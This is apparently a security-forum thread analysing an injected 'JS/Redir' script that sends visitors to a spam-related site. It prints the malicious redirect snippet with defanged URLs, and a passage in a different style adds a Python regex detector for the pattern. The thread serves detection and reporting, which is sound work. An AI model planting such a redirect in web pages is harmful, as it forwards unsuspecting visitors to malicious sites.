Is this JS/Redir being detected?

See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
Detected via a file viewer was the following JS/Redir code
See code:

< script >
var1=49;
var2=var1;
if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
< / script >

Read on this: http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (link post: Posted by Conrad Longmore)
Please wait a moment … You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus

Hi Polonus,

This technique is used with various URLs. A search on Google included:


Do you see the pattern?
~!Donovan

not detected… will upload sample to avast lab :wink:

VirusTotal
https://www.virustotal.com/file/f4ff9fbb00a204237f0f3cf8b87cc63ceb105003910cda53eb46719f2cabb374/analysis/1358368480/

Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the “If var1 Equals var2 Then Redirect!” pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (link article author !Donovan),

polonus

There are more variants on the same theme, see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (link author = Author: Adam Khoury ) and the malcode could also be combined with particular escape characters and through malicious spacing code…

polonus
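
The "if var1 equals var2 then redirect" pattern discussed in this thread, including the spacing and comparison-operator variants mentioned above, can be flagged with a small static check. The Python sketch below is an added example, not code from any poster or from avast; the function names, the regexes and the sample pages (using the placeholder host redirect.example) are constructed for illustration.

```python
import re

# Inline <script> bodies; tolerant of stray spacing inside the tags.
SCRIPT_RE = re.compile(r"<\s*script\b[^>]*>(.*?)<\s*/\s*script\s*>", re.I | re.S)
# Simple assignments: name = literal, or name = other_name
ASSIGN_RE = re.compile(r"(?:\bvar\s+)?\b([A-Za-z_$][\w$]*)\s*=\s*([\w$.'\"]+)\s*;")
# if (a == b) or if (a === b), followed by a string assigned to location
COND_REDIRECT_RE = re.compile(
    r"if\s*\(\s*([\w$]+)\s*(?:={2,3})\s*([\w$]+)\s*\)\s*\{?[^}]*?"
    r"(?:document|window|top|self)?\.?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']",
    re.I | re.S)

def resolve(name, env, depth=8):
    """Follow name -> name assignments until a literal or unknown name is reached."""
    while depth and name in env:
        name, depth = env[name], depth - 1
    return name

def find_tautological_redirects(html):
    """Return redirect targets guarded by a comparison that is always true."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        env = dict(ASSIGN_RE.findall(body))
        for left, right, url in COND_REDIRECT_RE.findall(body):
            # Both sides trace back to the same value: the "if" is only camouflage.
            if resolve(left, env) == resolve(right, env):
                hits.append(url)
    return hits

# Constructed samples (not taken from any real site).
SAMPLE_BASIC = """<html><body>Please wait a moment
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://redirect.example/landing.php";}
</script></body></html>"""

SAMPLE_SPACED = """< script >
  var  a = 7 ;
  var b=a;
  if ( b === a )
     window.location.href = 'http://redirect.example/x';
< / script >"""

SAMPLE_BENIGN = """<script>
var a=1; var b=2;
if(a==b){document.location="http://redirect.example/never";}
</script>"""

if __name__ == "__main__":
    for page in (SAMPLE_BASIC, SAMPLE_SPACED, SAMPLE_BENIGN):
        print(find_tautological_redirects(page))
```

This is a heuristic over literal text: script that is escaped or built at run time needs to be decoded before the check can see it.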

Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan

Hi !Donovan,

Good you alerted us to that. Seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on VirusWatch Archives and then I just fed the URIs to redleg’s fileviewer as I later reported to virus AT avast dot com. In a NoScript protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam click related malcode…

polonus

the URL hhac.net/upload.htm is now down…